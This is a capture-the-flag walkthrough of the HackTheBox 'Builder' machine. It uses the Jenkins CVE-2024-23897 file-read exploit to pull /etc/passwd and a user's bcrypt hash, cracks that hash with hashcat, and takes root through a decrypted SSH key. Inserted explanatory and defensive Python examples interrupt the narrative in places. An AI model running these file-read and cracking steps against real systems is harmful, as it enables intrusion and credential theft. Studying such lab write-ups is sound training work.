#hackthebox #linux #medium #jenkins

![[Pasted image 20250819234637.png]]

# Information Gathering - Nmap

First off, I started scanning all TCP ports with `Nmap`.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -Pn -n --open --min-rate 3000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-20 02:21 UTC
Nmap scan report for 10.10.11.10
Host is up (0.057s latency).
Not shown: 65186 closed tcp ports (reset), 347 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 18.74 seconds
```

I discovered ports 22 and 8080. I ran another TCP scan against them with the `-sCV` options to gather more information.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sCV -p 22,8080
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-20 02:22 UTC
Nmap scan report for 10.10.11.10
Host is up (0.049s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
8080/tcp open  http       Jetty 10.0.18
|_http-server-header: Jetty(10.0.18)
| http-robots.txt: 1 disallowed entry
|_/
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: Dashboard [Jenkins]
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.63 seconds
```

Lastly, a UDP scan against the top 10 ports.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sU --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-20 02:25 UTC
Nmap scan report for 10.10.11.10
Host is up (0.048s latency).

PORT     STATE         SERVICE
53/udp   open|filtered domain
67/udp   open|filtered dhcps
123/udp  closed        ntp
135/udp  closed        msrpc
137/udp  closed        netbios-ns
138/udp  closed        netbios-dgm
161/udp  closed        snmp
445/udp  closed        microsoft-ds
631/udp  closed        ipp
1434/udp closed        ms-sql-m

Nmap done: 1 IP address (1 host up) scanned in 5.13 seconds
```

---

# Enumeration

##### HTTP - TCP 8080

As we saw from the Nmap output, it's a `Jenkins` service on port 8080. In the past, when it came to a Jenkins service, I remember getting my initial access via the Groovy `Script Console`. However, I couldn't find the Script Console on the webpage, probably because I am not logged in.

![[Pasted image 20250819212900.png]]

Under the `People` tab, we see one user named `jennifer`.

![[Pasted image 20250819224334.png]]

The webpage displays the version information at the bottom right: `Jenkins 2.441`. I looked it up with `searchsploit` and it revealed one known exploit for that version: an `LFI`.

![[Pasted image 20250819213245.png]]

I downloaded the exploit with `searchsploit -m 51993`.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 51993.py -h
usage: 51993.py [-h] -u URL [-p PATH]

Local File Inclusion exploit for CVE-2024-23897

options:
  -h, --help            show this help message and exit
  -u, --url URL         The url of the vulnerable Jenkins service.
                        Ex: http://helloworld.com/
  -p, --path PATH       The absolute path of the file to download
```

I gave the exploit the required parameters and it successfully included the `/etc/passwd` file.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 51993.py -u http://$IP:8080 -p /etc/passwd
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
root:x:0:0:root:/root:/bin/bash
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
jenkins:x:1000:1000::/var/jenkins_home:/bin/bash
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
```

The official `Jenkins` security advisory explains the details of the vulnerability (CVE-2024-23897).

![[Pasted image 20250819215417.png]]

In addition to `/etc/passwd`, I read the `/proc/self/environ` file and discovered some useful information.
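The advisory referenced above describes the root cause of CVE-2024-23897: the argument parser used by the Jenkins CLI (args4j) expanded any argument beginning with `@` into the lines of the named file, and the parser's own error messages echoed the resulting argument back to the caller. The following Python model is an added illustration and is not code from this writeup, from Jenkins, from args4j or from the 51993 exploit. The toy `help` command, its error text and the sample file are constructed; what it shows is the unsafe expansion beside the hardened setting (the `@` syntax turned off), which is the class of fix the advisory describes.

```python
"""Model of the '@file' argument expansion behind CVE-2024-23897.
Added example: a toy CLI, not Jenkins or args4j code. It shows why reading a
file into the argument list and echoing arguments in error text leaks data,
and that disabling the '@' syntax removes the problem."""
import tempfile
from pathlib import Path

# Commands the toy CLI knows about; 'help <name>' is the only one implemented.
KNOWN_COMMANDS = {"help", "version"}


def expand_at_arguments(argv, at_syntax=True):
    """Mimic the default args4j behaviour: an argument '@<path>' is replaced by
    the lines of <path>. With at_syntax=False (the hardened setting) every
    argument is taken literally, so '@<path>' is just a string."""
    expanded = []
    for arg in argv:
        if at_syntax and arg.startswith("@"):
            expanded.extend(Path(arg[1:]).read_text().splitlines())
        else:
            expanded.append(arg)
    return expanded


def run_cli(argv, at_syntax=True):
    """Dispatch one command and return the text the caller would see.
    The 'no such command' branch echoes the offending argument, which is the
    channel through which file content reaches the caller when '@' expansion
    is on: the first line of the file becomes the 'command name'."""
    try:
        args = expand_at_arguments(argv, at_syntax)
    except OSError:
        # Missing or unreadable file: report it without echoing anything.
        return "error: file not found"
    if len(args) >= 2 and args[0] == "help":
        name = args[1]
        if name in KNOWN_COMMANDS:
            return f"{name}: usage text"
        return f"error: no such command: {name}"
    return "error: unknown command"


def demo():
    """Run the same request against the vulnerable and the hardened parser.
    Returns (vulnerable_output, hardened_output)."""
    with tempfile.TemporaryDirectory() as tmp:
        # Constructed stand-in for a file the CLI process can read but the
        # caller should never see.
        sample = Path(tmp) / "sample.txt"
        sample.write_text("first-line-of-sensitive-file\nsecond-line\n")
        request = ["help", "@" + str(sample)]
        return run_cli(request, at_syntax=True), run_cli(request, at_syntax=False)


if __name__ == "__main__":
    vulnerable, hardened = demo()
    print("at_syntax=True :", vulnerable)
    print("at_syntax=False:", hardened)
```

Running the block prints both outputs. The thing to notice is that the vulnerable parser returns the first line of the file inside an otherwise ordinary error message, which is the behaviour the exploit automates against the real CLI; with the `@` syntax off, the same request only echoes the literal `@/path` string, so there is nothing left to filter or rate-limit at the web layer.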
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 51993.py -u http://$IP:8080 -p /proc/self/environ
HOSTNAME=0f52c222a4cc
JENKINS_UC_EXPERIMENTAL=https://updates.jenkins.io/experimental
JAVA_HOME=/opt/java/openjdk
JENKINS_INCREMENTALS_REPO_MIRROR=https://repo.jenkins-ci.org/incrementals
COPY_REFERENCE_FILE_LOG=/var/jenkins_home/copy_reference_file.log
PWD=/
JENKINS_SLAVE_AGENT_PORT=50000
JENKINS_VERSION=2.441
HOME=/var/jenkins_home
LANG=C.UTF8
JENKINS_UC=https://updates.jenkins.io
SHLVL=0
JENKINS_HOME=/var/jenkins_home
REF=/usr/share/jenkins/ref
PATH=/opt/java/openjdk/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
```

According to the output above, the `Jenkins` home directory is `/var/jenkins_home`. I appended `/user.txt` to see if the file exists, and it did.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 51993.py -u http://$IP:8080 -p /var/jenkins_home/user.txt
eba2...
```

I tried installing `Jenkins` on my Kali using `docker` with the following command:

```bash
docker run -p 8080:8080 --restart=on-failure jenkins/jenkins:lts-jdk17
```

It then showed me the initial admin password and the location where it's stored.

![[Pasted image 20250819221638.png]]

That's the default path where `Jenkins` stores the initial admin password, but unfortunately the target returned `File not found`.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 51993.py -u http://$IP:8080 -p /var/jenkins_home/secrets/initialAdminPassword
File not found.
```

`Jenkins` keeps the mapping of its user accounts in `/var/jenkins_home/users/users.xml`. Inside, we can see the directory name `jennifer_12108429903186576833`, which corresponds to the only user we saw on the webpage at port 8080.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 51993.py -u http://$IP:8080 -p /var/jenkins_home/users/users.xml
<?xml version='1.1' encoding='UTF-8'?>
<string>jennifer_12108429903186576833</string>
<idToDirectoryNameMap class="concurrent-hash-map">
<entry>
<string>jennifer</string>
<version>1</version>
</hudson.model.UserIdMapper>
</idToDirectoryNameMap>
<hudson.model.UserIdMapper>
</entry>
```

Finally, the config file at `/var/jenkins_home/users/jennifer_12108429903186576833/config.xml` contained a lot of information about the user `jennifer`, including her password hash.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 51993.py -u http://$IP:8080 -p /var/jenkins_home/users/jennifer_12108429903186576833/config.xml
<passwordHash>#jbcrypt:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a</passwordHash>
```

Let's crack the hash!

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ echo '$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a' > hash.txt

┌──(kali㉿kali)-[~/Desktop]
└─$ hashcat -m 3200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
```

Successfully cracked the hash.
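The hash was exposed because a Jenkins user's `config.xml` under `JENKINS_HOME/users/` stores the bcrypt hash with a `#jbcrypt:` prefix, and any file read running as the Jenkins process can fetch it. As an added defender-side example, not part of this writeup and not Jenkins code, here is a small audit script that walks a Jenkins home, extracts each user's hash, reports the bcrypt cost factor and flags config files readable by accounts other than the owner. The directory layout it expects (`users/<id>_<number>/config.xml` containing a `<passwordHash>` element) is the one the writeup shows; the sample home it builds is constructed, the second user `alice` and her hash are dummies, and the minimum cost of 12 is a policy choice of mine, not a Jenkins default (Jenkins itself produced the cost-10 hash above).

```python
"""Audit per-user config.xml files in a Jenkins home for weak bcrypt cost
factors and over-permissive file modes. Added example; the layout assumed is
JENKINS_HOME/users/<dir>/config.xml with a <passwordHash> element."""
import os
import re
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# bcrypt modular-crypt format: $2a$<cost>$<22-char salt><31-char digest>
BCRYPT_RE = re.compile(r"^\$2[aby]\$(\d{2})\$[./A-Za-z0-9]{53}$")
JBCRYPT_PREFIX = "#jbcrypt:"
# Jenkins writes an XML 1.1 declaration; drop it so the parser never has to
# care about the declared version.
XML_DECL_RE = re.compile(r"^\s*<\?xml[^>]*\?>")


def parse_password_hash(config_xml_text):
    """Return (scheme, cost, digest) from a user config.xml, or None if the
    file carries no <passwordHash> element at all."""
    root = ET.fromstring(XML_DECL_RE.sub("", config_xml_text, count=1))
    node = root.find(".//passwordHash")
    if node is None or not node.text:
        return None
    value = node.text.strip()
    if not value.startswith(JBCRYPT_PREFIX):
        return ("unknown", None, value)
    digest = value[len(JBCRYPT_PREFIX):]
    match = BCRYPT_RE.match(digest)
    if not match:
        return ("malformed", None, digest)
    return ("bcrypt", int(match.group(1)), digest)


def audit_jenkins_home(jenkins_home, min_cost=12):
    """Walk users/*/config.xml and return one finding dict per user directory.
    min_cost is the policy threshold below which a bcrypt cost is flagged."""
    findings = []
    for config in sorted(Path(jenkins_home, "users").glob("*/config.xml")):
        parsed = parse_password_hash(config.read_text()) or ("none", None, None)
        scheme, cost, _ = parsed
        mode = os.stat(config).st_mode & 0o777
        findings.append({
            "user_dir": config.parent.name,
            "scheme": scheme,
            "cost": cost,
            "weak_cost": scheme == "bcrypt" and cost < min_cost,
            # Any group/other bit set means a non-owner account can read the hash.
            "readable_by_others": bool(mode & 0o077),
            "mode": oct(mode),
        })
    return findings


# Constructed template mirroring the element nesting Jenkins uses.
USER_XML = """<?xml version='1.1' encoding='UTF-8'?>
<user>
  <id>{user}</id>
  <properties>
    <hudson.security.HudsonPrivateSecurityRealm_-Details>
      <passwordHash>{hash}</passwordHash>
    </hudson.security.HudsonPrivateSecurityRealm_-Details>
  </properties>
</user>
"""

# Hash from the writeup (cost 10) and a dummy cost-12 value for contrast.
JENNIFER_HASH = "#jbcrypt:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a"
DUMMY_ALICE_HASH = "#jbcrypt:$2a$12$" + "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0"


def build_sample_home():
    """Create a constructed Jenkins home with two users and return its path."""
    home = Path(tempfile.mkdtemp(prefix="jenkins_home_"))
    samples = [
        ("jennifer_12108429903186576833", "jennifer", JENNIFER_HASH, 0o644),
        ("alice_1", "alice", DUMMY_ALICE_HASH, 0o600),
    ]
    for dirname, user, pw_hash, mode in samples:
        user_dir = home / "users" / dirname
        user_dir.mkdir(parents=True)
        config = user_dir / "config.xml"
        config.write_text(USER_XML.format(user=user, hash=pw_hash))
        os.chmod(config, mode)
    return home


if __name__ == "__main__":
    for finding in audit_jenkins_home(build_sample_home()):
        print(finding)
```

Run against a real `JENKINS_HOME`, the script gives a quick inventory of which local accounts have hashes below the chosen cost and which files are readable beyond the owner; both are cheap checks to add to a CI host's configuration review, alongside keeping the controller patched so that file reads like the one above are not possible in the first place.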
The password is `princess`.

```bash
$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a:princess

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQ.../L4l1a
Time.Started.....: Wed Aug 20 03:59:33 2025 (1 sec)
Time.Estimated...: Wed Aug 20 03:59:34 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:       65 H/s (3.38ms) @ Accel:4 Loops:16 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 16/14344385 (0.00%)
Rejected.........: 0/16 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1008-1024
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> jessica
Hardware.Mon.#1..: Util: 31%

Started: Wed Aug 20 03:59:29 2025
Stopped: Wed Aug 20 03:59:35 2025
```

# Shell as `root`

I logged into `Jenkins` with `jennifer:princess`.

![[Pasted image 20250819230216.png]]

![[Pasted image 20250819230301.png]]

There's an `SSH private key` credential, but the page doesn't show the key in plaintext. There's an update option.

![[Pasted image 20250819230603.png]]

Interestingly enough, when I did `View Page Source` on the page, it displayed what appeared to be the private key. Its CSS display attribute is set to hidden, though.

![[Pasted image 20250819231303.png]]

I explored `Jenkins` on port 8080 again, and now that I am logged in as `jennifer`, I am able to see the `Script Console`. With it, I decrypted the encrypted SSH key I found in `View Page Source`.

![[Pasted image 20250819233459.png]]

I made a new file named `private_key`, copy-pasted the key, changed the file permissions to `500`, and finally attempted to log into SSH with the key.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ chmod 500 private_key

┌──(kali㉿kali)-[~/Desktop]
└─$ ls -l private_key
-r-x------ 1 kali kali 2602 Aug 20 04:38 private_key
```

Successfully logged into `SSH` as `root`.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh -i private_key root@$IP
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-94-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

  System information as of Wed Aug 20 04:38:56 AM UTC 2025

  System load:                      0.0
  Usage of /:                       66.2% of 5.81GB
  Memory usage:                     21%
  Swap usage:                       0%
  Processes:                        214
  Users logged in:                  0
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for eth0:            10.10.11.10
  IPv6 address for eth0:            dead:beef::250:56ff:feb0:5d59

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Feb 12 13:15:44 2024 from 10.10.14.40
root@builder:~# whoami
root
```

Found `root.txt`.

```bash
root@builder:~# cat root.txt
f0f...
root@builder:~#
```